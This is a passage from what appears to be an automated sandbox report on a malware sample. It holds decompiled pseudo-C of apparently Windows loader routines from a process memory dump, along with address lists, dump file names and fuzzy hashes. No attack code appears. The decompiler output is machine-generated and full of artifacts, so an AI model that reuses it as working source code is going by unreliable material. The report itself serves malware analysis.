									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E05247D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x5205c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0525F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0525F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E052A7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L05242400(_t267 + 0x20);
															}
															L05242400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E05252397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E05242280(_t134, 0x5318608);
									__eflags =  *0x5316e48 - _t253; // 0x114af50
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0523FFB0(_t198, _t241, 0x5318608);
										__eflags = _t253;
										if(_t253 != 0) {
											L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x5316e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x5318608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E05256B90(_t210,  &_v64);
										_t262 =  *0x5318608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0525E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E052697C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0526006A(0x5318608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x5318608);
												E0526B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x5316904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x5316e48; // 0x114af50
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0523FFB0(_t198, _t240, 0x5318608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E052600C2(0x5318608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x052520a0
0x052520a8
0x052520ad
0x052520b3
0x052520b8
0x052520c2
0x052520c7
0x052520cb
0x052520d2
0x05252263
0x05252266
0x05295836
0x05295836
0x00000000
0x0525226c
0x0525226c
0x05252270
0x05252274
0x052520e2
0x052520e2
0x052520e6
0x052520ee
0x052957dc
0x052957de
0x052957ec
0x052957ec
0x052957f1
0x052957f3
0x052957f8
0x00000000
0x052957f8
0x052957e0
0x052957e4
0x052957ea
0x00000000
0x00000000
0x00000000
0x052957ea
0x052520f4
0x052520f4
0x052520f8
0x052520f8
0x052520fc
0x05252100
0x05252106
0x05252201
0x05252206
0x0525220b
0x0525220e
0x052522a9
0x052522ac
0x00000000
0x00000000
0x052522b2
0x052522b5
0x05295801
0x05295806
0x00000000
0x00000000
0x05295810
0x05295815
0x05295818
0x00000000
0x00000000
0x0529581e
0x052522bb
0x052522bb
0x05252218
0x05252218
0x0525221c
0x05252220
0x05252222
0x052522c2
0x052522c4
0x052522dc
0x052522dc
0x052522e1
0x00000000
0x00000000
0x00000000
0x052522e7
0x052522c8
0x052522cd
0x052522d3
0x052522d6
0x05295823
0x05295825
0x05295827
0x00000000
0x00000000
0x0529582d
0x00000000
0x0529582d
0x00000000
0x05252228
0x05252228
0x00000000
0x05252228
0x05252222
0x05252214
0x05252214
0x00000000
0x05252114
0x05252114
0x05252114
0x0525211a
0x0525211c
0x05252348
0x0525234d
0x05295840
0x05295845
0x05295848
0x0529584e
0x0529584e
0x05295848
0x05252353
0x05252355
0x05252388
0x05252388
0x05252368
0x0525236a
0x0525236c
0x0525238f
0x00000000
0x0525236e
0x0525236e
0x0525218e
0x0525218e
0x05252191
0x05252195
0x05295a03
0x05295a06
0x05295a0c
0x05295a0f
0x05295a11
0x05295a13
0x05295a13
0x05295a19
0x05295a1f
0x00000000
0x0525219b
0x0525219b
0x052521a0
0x05252282
0x05252284
0x05252284
0x05252284
0x05252284
0x052521a6
0x052521a9
0x052521ac
0x052521ae
0x052521b3
0x0525228b
0x05252290
0x05252379
0x05252296
0x05252298
0x05252298
0x05252290
0x052521b9
0x052521be
0x052522a2
0x052522a2
0x052521c4
0x052521c8
0x052521cc
0x052521d0
0x052521d4
0x052521de
0x052521e3
0x05295a29
0x05295a2c
0x00000000
0x00000000
0x05295a3b
0x00000000
0x052521e9
0x052521e9
0x052521e9
0x052521ee
0x052521f1
0x05295a45
0x05295a4b
0x05295a52
0x05295a58
0x05295a5d
0x05295a5f
0x05295a71
0x05295a61
0x05295a6a
0x05295a6a
0x05295a76
0x05295a79
0x05295a7f
0x05295a83
0x05295a85
0x05295a87
0x05295a87
0x05295a8c
0x05295a91
0x05295a97
0x05295a9f
0x05295aa0
0x05295aa1
0x05295aa6
0x05295aab
0x05295ab1
0x05295ab3
0x05295ab9
0x05295aca
0x05295ad4
0x05295ad4
0x05295ade
0x05295ade
0x05295aab
0x05295a79
0x05295a52
0x052521f7
0x052521f9
0x052521fe
0x052521fe
0x052521e3
0x05252195
0x0525236c
0x05252122
0x05252122
0x05252124
0x05252231
0x05252236
0x05252236
0x05252238
0x05252238
0x05252240
0x05252242
0x05252244
0x052959fc
0x0525218c
0x0525218c
0x00000000
0x0525218c
0x0525224a
0x0525224f
0x05252256
0x05252304
0x05252309
0x0525230f
0x0525231e
0x0525231e
0x0525231e
0x05252320
0x05252325
0x0525232a
0x0525232c
0x0525233e
0x0525233e
0x00000000
0x0525232c
0x05252311
0x05252317
0x0525231a
0x0525231c
0x05252380
0x05252380
0x05252380
0x05252384
0x00000000
0x00000000
0x05252386
0x00000000
0x0525231c
0x0525225c
0x0525225c
0x00000000
0x0525225c
0x0525212a
0x05252134
0x05252138
0x0525213d
0x05295858
0x05295863
0x05295863
0x05295867
0x0529586a
0x00000000
0x00000000
0x0529586c
0x0529586c
0x05295871
0x05295875
0x05295877
0x05295997
0x0529599c
0x052959a1
0x052959a7
0x052959a7
0x00000000
0x052959a7
0x0529587d
0x00000000
0x0529588b
0x0529588b
0x05295890
0x05295892
0x05295894
0x05295899
0x0529589b
0x052958a0
0x052958a0
0x052958aa
0x052958b2
0x052958b6
0x052958be
0x052958c6
0x052958c9
0x0529590d
0x05295917
0x0529591a
0x0529591c
0x05295920
0x05295928
0x0529592a
0x0529592c
0x0529592e
0x0529592e
0x052958cb
0x052958cd
0x052958d8
0x052958e0
0x052958f4
0x052958fe
0x052958fe
0x0529593a
0x0529593e
0x05295940
0x05295942
0x00000000
0x05295944
0x05295944
0x05295949
0x0529594e
0x0529594e
0x05295953
0x0529595b
0x05295976
0x05295976
0x0529597a
0x0529597f
0x00000000
0x00000000
0x00000000
0x00000000
0x05295981
0x05295981
0x05295981
0x05295983
0x05295988
0x0529598d
0x05295991
0x05295991
0x00000000
0x0529595d
0x0529595d
0x05295963
0x05295965
0x00000000
0x00000000
0x00000000
0x00000000
0x05295967
0x05295967
0x0529596b
0x0529596d
0x00000000
0x00000000
0x0529596f
0x05295971
0x05295971
0x05295974
0x00000000
0x00000000
0x00000000
0x05295974
0x00000000
0x05295967
0x0529595b
0x05295942
0x05295863
0x05252143
0x05252143
0x05252149
0x0525214f
0x052522f1
0x052522f6
0x00000000
0x05252173
0x05252173
0x0525217d
0x05252181
0x05252186
0x052959ae
0x052959b2
0x052959b5
0x052959b7
0x052959ba
0x052959cd
0x052959d1
0x052959d5
0x052959d9
0x052959db
0x00000000
0x00000000
0x052959dd
0x052959dd
0x052959e1
0x052959e4
0x052959e7
0x052959ee
0x052959ee
0x052959f3
0x052959f3
0x00000000
0x05252186
0x0525214f
0x05252106
0x05252266
0x052520d8
0x052520da
0x052520e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a4bc798826fc697b62fa23a462997e233013cae91734ca01be3fcbf643c7d9
Instruction ID: f84763bd5d0116d0b8dd7f765af1c7b21ed3e8a09ebbe79554efb069fa09f43b
Opcode Fuzzy Hash: e1a4bc798826fc697b62fa23a462997e233013cae91734ca01be3fcbf643c7d9
Instruction Fuzzy Hash: BBF1B439728342DFDB2ACB28C484B6B77E6BF85324F048519ED999B380D774D841CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0523D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0523D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x531d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E05236600(0x53152d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x5317b9c; // 0x0
							_t281 = L05244620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0526F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x5317b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x5317b8c;
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E05242280(_t200, 0x53184d8);
									_t277 =  *0x53185f4;
									_t351 =  *0x53185f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x11441e8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0523FFB0(_t287, _t353, 0x53184d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0527CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E05236600(0x53152d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E05237926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x531b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E052AE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x5318472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x531b218; // 0x0
														asm("ror edi, cl");
														 *0x531b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E05242280(_t250, 0x53184d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L05263898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0523FFB0(_t293, _t353, 0x53184d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E052637F5(_t353, 0);
																}
																E05260413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E05259B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E052502D6(_t174);
																}
																L052477F0( *0x5317b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0525C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0523EC7F(_t353);
										L052519B8(_t287, 0, _t353, 0);
										_t200 = E0522F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0526B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x531b2f8; // 0x12e0000
									if((_t206 |  *0x531b2fc) == 0 || ( *0x531b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x531b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E052D6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E052D6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0523E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0523EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E05269730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0523E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L05238F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E05263C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
